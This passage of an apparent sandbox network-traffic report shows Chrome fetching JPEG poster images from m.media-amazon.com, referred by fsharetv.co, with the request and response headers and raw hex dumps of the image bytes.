                                                                                                                                                                                          Data Ascii: p%}LRX$,OBG/l!wGl,b?BrD>/Y6)iv{V+6ZO0M<gxFk940f!^U6)DYW,b+"kB^1h?h&wfU|nUmr^#@NY79jg6N3K,a$LluDV6:`QM 6ffH_S
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 95 92 11 8f 77 2c a7 d1 fd dc a0 97 e6 9f 8a 8a dc 3a 8f d3 43 fe ee e5 90 3b 9c 72 3e 6a 2b 3b 47 ee b2 b0 fe 61 d1 18 1b 4a 78 f6 0f 36 50 88 7f 59 f7 c5 13 67 08 8b 70 83 d1 0c c8 6a 07 52 ff 00 dd 66 11 86 8c 5b a9 3c 53 41 b2 b3 da a1 31 fd e3 e6 54 5b a1 f3 50 b7 ca c2 22 da 1d 3c 1b 0f 9b ac a0 3b 43 79 a8 44 5b 0f 9b 28 63 1b 22 f2 2b e9 78 95 f4 9f 99 bc 50 fc d1 bf 9a fd 21 fb cc 0b fc 31 8b 5c 59 41 dc 08 ef 50 58 18 42 61 83 ba 68 06 00 df 34 5a d4 51 cf 5b a8 5e d4 51 1c 2c ea 50 83 14 40 17 ad 7e 5a f4 51 45 44 18 d0 bd 5d 1a f8 28 c1 7a 4e b7 fd 84 c5 af ee 57 45 e0 9b 34 68 de 0d f3 f9 3d dc d3 4c c7 7f 67 df b9 a6 eb 72 2c ab 6a 97 19 81 c4 57 76 d4 45 21 6e 19 36 de ba ba 7c 61 e7 09 63 12 eb 64 ff 00 a3 26 3c 22 4c 3e bb 29 ac 75 fb d0
                                                                                                                                                                                          Data Ascii: w,:C;r>j+;GaJx6PYgpjRf[<SA1T[P"<;CyD[(c"+xP!1\YAPXBah4ZQ[^Q,P@~ZQED](zNWE4h=Lgr,jWvE!n6|acd&<"L>)u


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          23192.168.2.1649739151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC660OUTGET /images/M/MV5BMGJhOTk0NjEtYzcxNi00ZjQwLWE0ZDItMGZhMGYzMTRlMWZhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31447
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 2449f801-175b-44ed-9dbd-932e30330803
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 13 Nov 2023 23:48:49 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 27 Nov 2044 00:14:56 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 750694
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200141-IAD, cache-nyc-kteb1890046-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 01 03 08 02 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 84 84 d8 a7 c8 6b 80 a7 c0 b8 0a
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5k
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 6a f3 35 89 49 2b 42 bd 79 f4 f5 78 db ac 21 52 94 da a1 be c3 e7 19 64 39 43 ab f9 2e 1b 9d e0 36 c4 72 8d 70 94 7b 31 6e 6d 16 cd 6e 81 5f b5 1f f8 f5 ff 00 2e eb 32 23 7b 72 25 b9 e6 db d1 31 25 b6 44 aa 31 27 e6 f5 39 a6 77 0e b1 f7 f3 fc 44 66 b0 b5 20 6f 6d 06 fe 6d 86 a9 ad d7 26 e6 a4 39 db 7e 78 dc fe bf e9 db 2a 88 50 36 8d 66 ca 9f 1b 30 2f 9d 9a b6 86 33 ad 41 3f 61 b3 8c ca 9c 67 d9 9c 67 13 cd 33 ea 9d fa ad 3a e3 76 f5 57 31 87 d8 dc 9c 56 49 93 2b 4a 5b f4 43 e7 a7 4c d2 ad 5a e6 ad 9b 6b be c4 91 d5 1a 30 74 22 d2 e6 65 5a b3 4b e0 72 24 88 d5 9a 45 a8 ba 1c 97 79 0b 91 4e 94 1e 37 27 04 d2 18 ae 8b 69 6b 36 26 95 f3 8c f8 95 32 79 0f 78 00 fb 1b 9c 66 60 e3 1e ce e3 78 9e 5f f2 af 7a 59 bb c3 54 c1 6d ac 5e 9b 35 bd 33 34 f8 f5 55 fb 15
                                                                                                                                                                                          Data Ascii: j5I+Byx!Rd9C.6rp{1nmn_.2#{r%1%D1'9wDf omm&9~x*P6f0/3A?agg3:vW1VI+J[CLZk0t"eZKr$EyN7'ik6&2yxf`x_zYTm^534U
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 73 6a a7 80 b4 13 57 19 26 fc 69 a6 09 5b cb 6d 10 07 40 c7 6a 0c 85 ba b2 95 c0 5b ef 94 2e 03 a1 31 cf 84 c7 48 30 51 f9 22 f3 70 e7 ac 05 c1 1f 80 e5 6c b0 bc 57 f8 27 62 15 49 62 7e ab e7 19 e8 79 b3 90 3a ff 00 9d 96 da e5 5c 3c a3 a1 2c c4 50 09 5c 05 cc 86 aa 8b 54 4b ea a2 d5 02 aa 2d 50 2a ab 19 79 28 ec 9d 08 f5 15 4d ac 25 b5 51 6a 90 f5 51 6a 81 55 16 a8 15 4d f5 1b 1a a7 55 d1 c2 52 4b 1d f0 07 9c e4 89 6b ab ae 54 e4 f7 de 43 5f 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f ff c4 00 35 10 00 01 04 01 01 06 06 02 02 01 04 01 05 00 00 00 01 00 02 03 04 11 12 05 10 13 14 21 31 06 15 16 22 32 33 20 41 23 30 51 34 42 50 61 24 40 52 53 60 71 ff da 00 08 01 01 00 01 08 02 ff 00 87 b7 b4 e1 a6 40 93 d4 35
                                                                                                                                                                                          Data Ascii: sjW&i[m@j[.1H0Q"plW'bIb~y:\<,P\TK-P*y(M%QjQjUMURKkTC_?5!1"23 A#0Q4BPa$@RS`q@5
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: d1 38 b4 f1 43 7e 4d 9a 35 79 ed 95 b8 64 50 48 d4 e6 3c a8 a5 6b 5b 83 ce c4 a4 b4 c2 a3 3a b2 a5 e8 50 41 07 11 d4 5b 25 f5 a0 95 d5 23 92 68 c0 50 51 2e f7 1b 38 4e 18 40 65 1e 89 e7 db be 27 63 39 98 f7 43 7e db ff 00 51 12 94 b4 89 1a 88 dc d0 a1 0a 0c 90 4a 8e 67 7f b2 12 5d f2 bf 58 bc 6b 65 c2 5e ce 9a 4a a1 ad af 51 ea ff 00 72 9f f6 8b 82 7a 8a 4d 2a 47 64 a0 82 64 66 57 35 8d b3 10 95 ec 8c 43 53 84 dc 2b b6 43 32 d0 e3 a8 f5 7b 73 95 a3 09 95 f8 8a c7 7c 6e 0b 48 0d 05 cf 67 44 37 ed d3 89 e2 4f d2 d1 ee c6 e0 a2 97 42 d9 f3 b5 e3 4b a3 9b 4b f2 0d b8 da a0 bf c6 71 60 d2 ce a5 3b 84 b8 f0 b5 6d 0b 01 ce fe 3e 33 d5 28 f9 87 60 9d 9b 5d 9d dc ca b1 a9 66 88 67 49 39 41 35 6c 5d 0c 33 4c f3 b4 5b 26 b7 be 85 f3 34 44 99 3d e4 e5 dd d6 14 9d 96
                                                                                                                                                                                          Data Ascii: 8C~M5ydPH<k[:PA[%#hPQ.8N@e'c9C~QJg]Xke^JQrzM*GddfW5CS+C2{s|nHgD7OBKKq`;m>3(`]fgI9A5l]3L[&4D=
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: e0 9a ed 2b ba d9 d5 b9 a9 03 56 d6 0d 65 80 c6 6c 4a 66 c3 f5 2d a6 d8 8c 6c 64 82 a3 dc e7 35 cd 67 0f e3 70 83 a0 a3 84 d2 a4 61 76 71 22 8e 13 18 c9 21 1d d8 dc 7f a0 a1 bf c5 1f 6c 08 47 84 d7 1f 8b 58 38 45 4e 62 7a 63 84 80 b4 b8 63 74 79 ec b6 68 e5 a3 74 86 38 25 9a 61 aa 06 06 0d 2d 91 b1 3f e4 67 e1 e9 02 cc 10 c8 d2 1b 26 c6 98 f6 7d 77 b3 b8 fd 2a ff 00 ee 52 80 c7 e5 39 cb 3b 8e e2 77 3b f2 c6 e1 bf c5 1f 6c 2a 37 65 67 87 d8 bf 56 5a 2a d0 6c d2 46 d1 e5 cc 1d b9 06 ae 4c 2e 54 26 c3 9e fc 00 b8 0d 5c b3 17 09 a8 30 0d db 6e be 58 64 03 f4 b5 16 e5 12 02 7b 87 e0 5d 95 8f cd a3 71 43 7f 8a be d8 13 1d 85 c4 cf 54 ec 34 65 6c af bd af 71 70 41 e1 6b 09 f2 b5 34 ac ad 4b 5a 32 2b 3b 4c 41 f2 3e 22 0a 6d b7 24 f1 bd aa bc 12 4f 81 1d ca d3 d3
                                                                                                                                                                                          Data Ascii: +VelJf-ld5gpavq"!lGX8ENbzcctyht8%a-?g&}w*R9;w;l*7egVZ*lFL.T&\0nXd{]qCT4elqpAk4KZ2+;LA>"m$O
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: c0 f7 4f 55 91 c3 5e 40 da ac 35 df 32 a7 56 19 19 3b e5 6d 4a d3 b6 5e 0d 0a b1 ce e7 f1 03 68 ad 21 61 5d 89 f1 c8 44 36 e4 32 b8 31 49 52 ad 63 a2 6b 74 db 0e 87 33 95 ab 1c 50 be 4b 74 e3 64 71 4d 13 36 7b 24 aa 66 1b 3f 66 b2 c3 24 7b da cd 58 02 f6 cd 8e 06 6a 8f 67 54 65 a9 9b 1b b0 16 cf a8 cb 53 36 37 57 6c 24 9e 2c 94 e9 c6 c8 a4 35 ab c1 34 ae 8d 43 40 01 2b ec 29 3e 25 0d fe 26 fb 61 dd 05 a6 53 ad ed ab b4 59 60 49 04 dd 93 08 d4 d5 b5 6f 17 58 79 89 d2 17 9c b8 70 ed 41 03 14 ce 64 15 f8 03 67 d9 e0 45 68 b7 9e 75 ba d2 32 4d 91 28 8d f2 95 2f 16 76 e8 79 e9 bb 6b db cd 83 c3 6c c4 3c 48 ac 41 15 b7 99 a3 bb 3c 7a 22 82 29 36 8b e0 82 a8 87 6a 4e 2c f0 a6 51 5b e5 e0 ae e6 c3 6e 13 33 9a cd 98 e6 46 e3 33 eb 5f 86 62 f8 9f b2 5c d8 6d 0d 63
                                                                                                                                                                                          Data Ascii: OU^@52V;mJ^h!a]D621IRckt3PKtdqM6{$f?f${XjgTeS67Wl$,54C@+)>%&aSY`IoXypAdgEhu2M(/vykl<HA<z")6jN,Q[n3F3_b\mc
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 15 7e 23 d4 43 15 43 16 54 1e 5b c7 30 c0 82 d0 ec 14 45 c1 6c f4 b7 fd 6d 33 f5 37 4b eb 01 77 44 66 4c 95 b0 35 84 2c aa 84 b7 70 35 56 82 b0 05 d4 be ec a2 56 73 f2 8c a4 82 06 ce 30 48 42 41 80 1c 83 2b 38 e8 a4 03 83 2d f4 68 22 5a c7 24 db f3 8d 46 3c 80 ea e7 73 ad 37 7d 8b 6f ff 00 19 a8 aa e4 2a a5 75 90 b8 63 d2 d4 04 79 ae a3 9d c6 0c 96 c0 8c b9 61 d1 86 54 c0 25 ba 4d df 25 e2 f1 1a 92 66 f1 59 05 ff 00 9d a3 38 09 ab 5b f2 14 d3 5e 41 8a f9 3e 0b 08 6c 13 62 db e2 70 ae 66 c3 bf 10 28 1d 3f b1 d0 fd 40 d3 ec 43 70 56 da ff 00 64 00 d4 8c 90 da 8a 95 50 15 17 94 28 55 ac c1 11 2f cd 9b 63 8f 8c 6d b2 af 88 31 7e 89 80 79 3d 71 d1 be 8c 0f fd 11 1e a5 b1 76 b0 47 a1 4b 4c 97 52 d1 ab 0c 8c b0 ff 00 d2 5c e7 91 00 ab fd d0 ae e5 86 af 97 4c 1c
                                                                                                                                                                                          Data Ascii: ~#CCT[0Elm37KwDfL5,p5VVs0HBA+8-h"Z$F<s7}o*ucyaT%M%fY8[^A>lbpf(?@CpVdP(U/cm1~y=qvGKLR\L
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 3b 8c 6d 3b 55 5b 31 11 f2 14 0e 15 36 2c 53 0a e7 26 6d 9a 5d d6 36 c9 76 92 bb 76 ef 6a 05 4a 2c 0d a8 64 00 a5 d6 d8 6c 24 d3 62 95 fc dd c6 3f 18 84 02 0b 1b 56 dd a2 59 82 a3 07 1b 48 97 a6 e0 38 3a 92 03 09 48 cd aa 21 3e f3 76 92 b5 da 05 0b ca 9c c0 e3 04 d0 d4 a1 40 d7 50 25 5a 6f ec 17 2b b6 0b 3d 96 5a ac d9 50 78 69 ed 65 c8 5b 2e f0 10 18 ec aa 99 6f 71 1c aa 91 c1 0e 18 18 5a 69 fe 53 60 15 d9 d4 0d c4 c4 d4 28 f6 c3 99 5b ec ec 37 91 e5 f4 2f a7 da cc 2c b4 82 03 d3 b4 0d c1 4c 5a 4e 3c f3 5e 81 91 d6 38 19 83 50 bc bc b3 d8 58 e4 81 e6 7f 9c 17 f6 10 a4 0d b4 e6 2d 25 d7 7d 7f aa 16 6a ee 2c bb 97 4e ec d6 10 c7 4c 1c 38 65 ab 20 c7 d3 e2 ad d1 3f 78 a5 cc bc 16 22 63 f3 02 33 7e 03 8e 70 38 21 1b c6 5e ac 8d ca 4c ae f7 a9 b7 28 e5 6a 5f
                                                                                                                                                                                          Data Ascii: ;m;U[16,S&m]6vvjJ,dl$b?VYH8:H!>v@P%Zo+=ZPxie[.oqZiS`([7/,LZN<^8PX-%}j,NL8e ?x"c3~p8!^L(j_
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 34 d2 fa 5c 9a 69 b9 31 d5 fa a6 a9 a6 75 45 7c 13 1d c2 50 22 77 26 99 d5 15 f0 4d 26 30 8b 96 4d dc 25 34 d2 fa 5d da b2 6e e1 29 8e a7 d5 28 11 1a c4 5e 9a 40 38 c4 04 74 c7 57 d3 c7 d7 93 b2 e5 b0 df 33 a4 ba 5f 18 4c 5f b9 74 6d 64 6d 46 bf 98 95 3f 10 fc 48 3b dc ea f8 85 d2 f8 19 28 d7 15 b4 81 9b 19 20 dd 71 26 15 7e 06 54 34 c6 f8 9f b4 ba 20 b6 bd d8 21 65 e3 2a c0 f6 f5 5d 02 85 bd c8 10 df a5 e2 93 27 b1 03 0e c9 5d 8c 7e b8 21 5b 6c a6 3f 0f a8 af 6e 40 fa 7a ac 5d 96 ae f2 ba 7f 1b 29 67 5f 44 cf 9a fe 69 71 23 53 a0 02 ba 3f 02 9a ac e2 af fd 9d e2 7f ba ff 00 b4 a8 f6 65 1a d7 0d 71 94 16 4a e9 1c ae 49 af 1b d8 eb fb c2 69 76 4c 7c 4f 89 db 51 a3 fd be 49 d6 87 d1 d9 38 c6 12 a6 03 32 d3 ff 00 6b 55 5f d0 f0 85 d2 0e 7b 3c 34 be ef aa fe
                                                                                                                                                                                          Data Ascii: 4\i1uE|P"w&M&0M%4]n)(^@8tW3_L_tmdmF?H;( q&~T4 !e*]']~![l?n@z])g_Diq#S?eqJIivL|OQI82kU_{<4
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 44 a3 e2 84 72 45 e8 7f 03 b2 ec e7 c1 1a ee e4 e2 81 d2 75 4a b8 6a 40 1e d1 28 53 76 09 95 c0 dc a1 0e 40 fe 0b 65 d9 af 5d e7 30 1e 0a 3c 14 78 2f 44 73 84 33 e1 7e 6a 7f 09 b2 ec fd eb fd 66 28 a3 c9 12 98 e4 c4 c8 04 5e bc 4d 02 65 35 82 8f 77 3a 33 5f 1c 8d 97 67 aa 32 7d 15 d9 89 e5 ea 41 09 fa ba e1 08 b2 2e 58 60 bb d1 f1 32 0a 10 47 32 60 f6 ab d1 e5 6c 95 8e 7c 73 e0 9a 98 98 98 9a 8c 27 49 58 66 eb 04 e8 8b cd e8 e9 6b 2b 1c 17 54 5f 88 e5 98 45 5e bf de 63 c9 13 f4 4e f5 09 83 35 c5 1b b3 8e 59 a7 6a 35 39 84 99 11 b9 18 5e 4b a4 d3 45 8a 3c c9 e5 ff 00 49 de a1 1e 73 57 23 08 cd 4c c1 0a 15 3e 28 94 4a 71 4f 29 e9 d3 cc 89 d0 77 a8 4c 1e 2a 14 66 85 0a 14 26 03 de 9a 07 7a 68 3d eb 22 38 bf 45 92 1c 5f a2 60 13 84 a6 0f 15 92 1c 45 30 01 da
                                                                                                                                                                                          Data Ascii: DrEuJj@(Sv@e]0<x/Ds3~jf(^Me5w:3_g2}A.X`2G2`l|s'IXfk+T_E^cN5Yj59^KE<IsW#L>(JqO)wL*f&zh="8E_`E0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          24192.168.2.1649736151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC660OUTGET /images/M/MV5BODE3YWNkZGQtZGZjNy00NDZlLWI1MzAtZWUzYTgwM2NiZjA2XkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 31011
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: c6516d25-c917-4032-bc36-5920a2b603e8
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 14 Nov 2016 17:46:19 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 10 Oct 2044 00:41:27 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1490160
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000100-IAD, cache-nyc-kteb1890056-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c4 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 06 07 03 08 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f4 88 77 c7 3b 71 78 83 82 d5 cc ce aa
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5w;qx
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 71 ac f5 f3 ef a0 b1 03 1f 9a 5c fd 45 a4 f9 d7 d4 37 9c c2 f1 8f 49 71 75 c2 da e9 f3 39 75 4a 36 9f ae da 96 18 6e 70 7b 63 60 75 80 ed fb 70 ce ef f8 67 5a ea d7 2a f5 bf 8d f5 e7 97 f5 27 95 fd 0d 9e 98 b3 d6 2e 7e 73 ea fb d9 aa 9d fb 7c ed 8d 51 32 3e df 83 23 c0 dd 45 a8 7a de 5d 9c cd 3d 14 e2 16 cd 3a 11 91 9c b8 f7 c3 22 77 6a 2d 32 5f 45 0a 56 ef 47 ab 22 b1 b5 79 68 ab 76 d5 23 38 fa 32 ed 4e 0d fe 97 da 57 98 d2 ad cf a5 52 69 d6 7e 1f 4f 2c d1 af 7b 26 fc 19 b6 b5 26 bd 69 52 f1 9f b4 bc 3b 7c ae 7b 3e 45 69 c6 62 40 ef f3 bf 5f d3 93 87 fd de 66 eb 65 64 f7 dd f0 80 01 35 6c cf 75 8c 8a a2 47 8f 65 92 a2 33 9e 33 b2 f1 89 ec dd ca ad 14 9a b6 c0 77 9c 43 6b e9 0b 11 c3 1c e9 ae 27 cd 8c 7d 4b 27 c3 e8 79 d1 b7 a9 86 bc be 64 a4 fb 47 9e 5d
                                                                                                                                                                                          Data Ascii: q\E7Iqu9uJ6np{c`upgZ*'.~s|Q2>#Ez]=:"wj-2_EVG"yhv#82NWRi~O,{&&iR;|{>Eib@_fed5luGe33wCk'}K'ydG]
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 5a d6 b5 ad 6b 5a d6 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 62 b1 58 ac 51 f4 7d ff 00 c1 37 a3 ef d1 72 74 d2 4a 57 e3 6f 30 ca 1d 08 23 cd b3 77 51 33 12 6a 79 19 31 af 3b 30 76 57 9e 4f 79 06 e1 c1 d2 96 57 72 12 85 cb bf c1 bb 63 9d 7d 73 ff 00 1c 94 2e 1e 24 5d e1 90 be c0 c5 33 3e 1a bc e7 67 34 f7 2c 98 52 66 3b 34 b5 34 9e ed 7d 0d e8 fb f4 4d fe aa 64 92 12 a1 59 e4 8c 1c 96 10 83 a9 88 a9 d8 1f d3 9e 9c 43 9e fb c4 49 5a 6e 33 be 71 11 f6 50 e2 18 34 ab 14 a3 2b ea 23 35 22 85 46 35 08 84 a9 c3 4c 91 2e ca 12 2d f1 5c 50 e0 d3 20 93 0c 0c 08 41 14 2d 94 77 f4 37 a3 ef d1 71 07 3e a0 a2 97 3b d0 81 d0 30 1c 2c 9b 2a c7 6e 51 d9 c4 11 34 74 e8 49 92 20 21 22 9d 76 9d 70 b0 37 b5 2b cb 49 80 b4 83 50 a3 f6 25
                                                                                                                                                                                          Data Ascii: ZkZXV+bXV+bXV+bXQ}7rtJWo0#wQ3jy1;0vWOyWrc}s.$]3>g4,Rf;44}MdYCIZn3qP4+#5"F5L.-\P A-w7q>;0,*nQ4tI !"vp7+IP%
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 5d e2 8f 39 26 bf ee ac 3f d2 be 09 a7 40 7b d4 ef a7 e2 a7 6f c8 c7 1f e1 53 7e 9b fb 60 6d 92 3f 4f dd 49 1d 47 27 18 d6 9b a9 4b 31 d2 b2 ab dc d8 7f 3e 6b a9 44 21 97 b4 72 6c c0 34 3f a6 ae 2b cd 71 77 a9 af 1e 6f 90 c6 a0 b9 c9 c1 91 73 de 90 16 6d 00 61 07 bd ad 6d 4c db c8 6d 87 3b a2 f8 75 28 74 63 25 7d 50 26 ad c7 29 c1 46 3a d4 5e 16 34 3b d3 0c 64 d1 c0 46 72 23 59 13 73 75 1f 17 be 82 f6 26 ac db 28 be 9f ba db 1e da ba 90 46 cb c0 b5 23 e7 5d ad 67 10 b0 66 be ba f3 06 94 6d d8 05 f8 ab e3 ee 00 57 4e b4 80 c5 c9 2f 51 86 04 2a 61 85 f3 83 56 e3 e7 59 ba 69 76 5a 95 96 da d9 80 b2 8c 2c 51 62 4b fe 3c e6 f7 a9 f9 80 14 7c f8 5a a0 81 49 28 dd aa 1a 51 50 f6 26 92 a5 ed b5 5c 91 c5 2d 5b 49 19 0b 57 8f b8 a4 ee 05 5b 47 c7 1a e4 fa 1e 55 8c
                                                                                                                                                                                          Data Ascii: ]9&?@{oS~`m?OIG'K1>kD!rl4?+qwosmamLm;u(tc%}P&)F:^4;dFr#Ysu&(F#]gfmWN/Q*aVYivZ,QbK<|ZI(QP&\-[IW[GU
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: c7 65 bd f8 d8 78 fd fe c2 a0 5c e2 a5 9d 21 ee f2 f5 a4 1f c7 37 50 96 5f 9e 95 fc 0b fb 33 f4 c8 a6 0f 56 1d 18 c6 db 4d e1 3c 0d 25 08 25 5e d5 e5 5a 92 d7 07 26 88 cd 18 14 d7 97 4a 36 e9 43 c7 ef f6 ba df e5 1f 8f 48 fe 0f d8 77 11 82 cc b2 ab 27 25 0e b1 20 39 37 57 9c 08 8f 56 97 42 e4 16 1f b2 3c 7e ff 00 6b ad fe 51 d5 9d 9f 98 12 78 5a 5e 35 b4 24 8b 0b d3 70 1c 9e 46 c9 22 29 92 dd 11 24 c8 c6 6b fa 8c 14 f7 91 46 75 69 6e 16 28 f9 2a ee f1 ae 4f 7b 4e a0 8c 04 2d 15 a4 72 b6 07 5a fc 23 15 d2 97 10 0f da 1e 3f 7f b5 d6 fe 63 ab 2b ef 2b bd 67 e6 ad 53 78 2e 05 58 cd a2 5c 55 94 7b c8 29 89 62 58 f4 77 3c 85 28 fd f8 59 06 97 92 15 91 38 d9 94 c3 d3 da 3c 4b 56 ff 00 9a 57 5b fc 63 ab 15 d6 18 ff 00 68 78 fd fe d7 5c ff 00 c5 56 f6 72 5c 02 52
                                                                                                                                                                                          Data Ascii: ex\!7P_3VM<%%^Z&J6CHw'% 97WVB<~kQxZ^5$pF")$kFuin(*O{N-rZ#?c++gSx.X\U{)bXw<(Y8<KVW[chx\Vr\R
